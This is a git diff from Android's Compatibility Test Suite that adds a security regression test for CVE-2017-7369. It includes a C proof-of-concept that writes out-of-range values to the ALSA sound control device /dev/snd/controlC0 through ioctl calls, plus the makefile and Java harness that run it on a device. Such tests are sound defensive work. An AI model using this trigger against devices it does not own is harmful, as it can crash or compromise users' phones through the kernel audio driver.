CTS test case for Bug 33751424 CTS test case is testPocCVE_2017_7369 Fixing conflicts Bug: 33751424
am: de36163356
Change-Id: Ibc28030360c98d789b0e17c8a6720bdd0ac107ff
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 4a9e699..41775b3 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -53,6 +53,7 @@
<option name="push" value="CVE-2017-0577->/data/local/tmp/CVE-2017-0577" />
<option name="push" value="CVE-2016-10231->/data/local/tmp/CVE-2016-10231" />
<option name="push" value="CVE-2017-0564->/data/local/tmp/CVE-2017-0564" />
+ <option name="push" value="CVE-2017-7369->/data/local/tmp/CVE-2017-7369" />
<option name="append-bitness" value="true" />
</target_preparer>
<test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
diff --git a/hostsidetests/security/securityPatch/CVE-2017-7369/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-7369/Android.mk
new file mode 100644
index 0000000..9d1d3d17
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-7369/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-7369
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+LOCAL_SRC_FILES := poc.c
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-7369/poc.c b/hostsidetests/security/securityPatch/CVE-2017-7369/poc.c
new file mode 100644
index 0000000..c18936c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-7369/poc.c
@@ -0,0 +1,236 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/ptrace.h>
+#include <errno.h>
+#include <sys/syscall.h>
+#include <sys/prctl.h>
+#include <stdint.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <linux/fb.h>
+#include <dlfcn.h>
+#include <sys/socket.h>
+#include <fcntl.h>
+#include <signal.h>
+#include <unistd.h>
+#include <sound/asound.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#define MAXNUM 94
+#define MAXPCMOP 25
+#define MAXELE 16384
+
+char* CONTBL[MAXNUM]={
+ "comprC0D17",
+ "comprC0D18",
+ "comprC0D37",
+ "comprC0D38",
+ "comprC0D39",
+ "comprC0D40",
+ "comprC0D41",
+ "comprC0D42",
+ "comprC0D9",
+ "controlC0",
+ "hwC0D10",
+ "hwC0D1000",
+ "hwC0D11",
+ "hwC0D12",
+ "hwC0D13",
+ "hwC0D14",
+ "hwC0D15",
+ "hwC0D16",
+ "hwC0D2",
+ "hwC0D20",
+ "hwC0D21",
+ "hwC0D22",
+ "hwC0D24",
+ "hwC0D25",
+ "hwC0D26",
+ "hwC0D3",
+ "hwC0D30",
+ "hwC0D31",
+ "hwC0D35",
+ "hwC0D36",
+ "hwC0D37",
+ "hwC0D39",
+ "hwC0D40",
+ "hwC0D45",
+ "hwC0D7",
+ "hwC0D8",
+ "hwC0D9",
+ "pcmC0D0c",
+ "pcmC0D0p",
+ "pcmC0D10c",
+ "pcmC0D10p",
+ "pcmC0D11c",
+ "pcmC0D11p",
+ "pcmC0D12c",
+ "pcmC0D12p",
+ "pcmC0D13c",
+ "pcmC0D13p",
+ "pcmC0D14c",
+ "pcmC0D14p",
+ "pcmC0D15c",
+ "pcmC0D15p",
+ "pcmC0D16c",
+ "pcmC0D19c",
+ "pcmC0D19p",
+ "pcmC0D1c",
+ "pcmC0D1p",
+ "pcmC0D20c",
+ "pcmC0D20p",
+ "pcmC0D21p",
+ "pcmC0D22c",
+ "pcmC0D22p",
+ "pcmC0D23c",
+ "pcmC0D23p",
+ "pcmC0D24c",
+ "pcmC0D24p",
+ "pcmC0D25c",
+ "pcmC0D26p",
+ "pcmC0D27c",
+ "pcmC0D28c",
+ "pcmC0D29c",
+ "pcmC0D2c",
+ "pcmC0D2p",
+ "pcmC0D30c",
+ "pcmC0D31c",
+ "pcmC0D32c",
+ "pcmC0D33c",
+ "pcmC0D34c",
+ "pcmC0D35c",
+ "pcmC0D35p",
+ "pcmC0D36c",
+ "pcmC0D36p",
+ "pcmC0D3c",
+ "pcmC0D3p",
+ "pcmC0D43c",
+ "pcmC0D44c",
+ "pcmC0D44p",
+ "pcmC0D45c",
+ "pcmC0D45p",
+ "pcmC0D4p",
+ "pcmC0D5c",
+ "pcmC0D5p",
+ "pcmC0D6c",
+ "pcmC0D7p",
+ "pcmC0D8c"
+};
+
+ char* OPPCM[MAXPCMOP]={
+ "/dev/snd/pcmC0D0p",
+ "/dev/snd/pcmC0D10p",
+ "/dev/snd/pcmC0D11p",
+ "/dev/snd/pcmC0D12p",
+ "/dev/snd/pcmC0D13p",
+ "/dev/snd/pcmC0D14p",
+ "/dev/snd/pcmC0D15p",
+ "/dev/snd/pcmC0D19p",
+ "/dev/snd/pcmC0D1p",
+ "/dev/snd/pcmC0D20p",
+ "/dev/snd/pcmC0D21p",
+ "/dev/snd/pcmC0D22p",
+ "/dev/snd/pcmC0D23p",
+ "/dev/snd/pcmC0D24p",
+ "/dev/snd/pcmC0D2p",
+ "/dev/snd/pcmC0D32p",
+ "/dev/snd/pcmC0D33p",
+ "/dev/snd/pcmC0D3p",
+ "/dev/snd/pcmC0D40p",
+ "/dev/snd/pcmC0D41p",
+ "/dev/snd/pcmC0D44p",
+ "/dev/snd/pcmC0D47p",
+ "/dev/snd/pcmC0D4p",
+ "/dev/snd/pcmC0D5p",
+ "/dev/snd/pcmC0D7p"
+};
+
+void poc(char* name)
+{
+ int fd, ret, cmd, index,pcmfd, i;
+ char dev[36]={0};
+ snprintf(dev, sizeof(dev),"/dev/snd/%s", name);
+ fd = open(dev, O_RDWR);
+ if (fd < 0)
+ {
+ return;
+ }
+
+ cmd = SNDRV_CTL_IOCTL_CARD_INFO;
+ struct snd_ctl_card_info info;
+ ret = ioctl(fd, cmd, &info);
+
+ struct snd_ctl_elem_list lst;
+ struct snd_ctl_elem_value control;
+ memset(&lst, 0, sizeof(lst));
+ lst.pids = calloc(MAXELE, sizeof(struct snd_ctl_elem_list));
+ lst.space = MAXELE;
+ cmd = SNDRV_CTL_IOCTL_ELEM_LIST;
+ ret = ioctl(fd, cmd, &lst);
+ control.value.integer.value[0]=control.value.enumerated.item[0] = 0x80001111;
+
+ for(index=0;(unsigned int)index<lst.count;index++)
+ {
+ if(!strncmp((const char *)lst.pids[index].name,"SLIM_1_TX Channels",18)||
+ !strncmp((const char *)lst.pids[index].name,"SLIM_0_TX Channels",18)||
+ !strncmp((const char *)lst.pids[index].name,"SLIM_6_RX Channels",18)||
+ !strncmp((const char *)lst.pids[index].name,"SLIM_5_RX Channels",18)||
+ !strncmp((const char *)lst.pids[index].name,"SLIM_0_RX Channels",18)||
+ !strncmp((const char *)lst.pids[index].name,"Playback 24 Volume",18)||
+ !strncmp((const char *)lst.pids[index].name,"left Profile",12)||
+ !strncmp((const char *)lst.pids[index].name,"Playback Device Channel Map",27)||
+ !strncmp((const char *)lst.pids[index].name, "LSM",3)||
+ !strncmp((const char *)lst.pids[index].name,"MAD Input",9)||
+ !strncmp((const char *)lst.pids[index].name, "AUDIO_REF_EC_UL",15)||
+ !strncmp((const char *)lst.pids[index].name, "VOC_EXT_EC",10)) continue;
+
+ control.id.numid=lst.pids[index].numid;
+ ret = ioctl(fd,SNDRV_CTL_IOCTL_ELEM_WRITE,&control);
+ }
+ close(fd);
+}
+
+struct mystruct{
+ int a;
+ char* pp;
+};
+
+void freeptr(struct mystruct* p)
+{
+ unsigned char* n = (unsigned char *)p->pp;
+ n = NULL;
+ p->pp = NULL;
+ p = NULL;
+}
+
+int main()
+{
+ int i =0;
+ for(i = 0; i< MAXNUM; i++)
+ {
+ poc("controlC0");
+ break;
+ }
+ return 1;
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_06.java b/hostsidetests/security/src/android/security/cts/Poc17_06.java
index 7926857..e08aa9e 100644
--- a/hostsidetests/security/src/android/security/cts/Poc17_06.java
+++ b/hostsidetests/security/src/android/security/cts/Poc17_06.java
@@ -53,4 +53,15 @@
AdbUtils.runPoc("CVE-2017-0579", getDevice(), 60);
}
}
+
+ /**
+ * b/33751424
+ */
+ @SecurityTest
+ public void testPocCVE_2017_7369() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/snd/controlC0")) {
+ AdbUtils.runPoc("CVE-2017-7369", getDevice(), 60);
+ }
+ }
}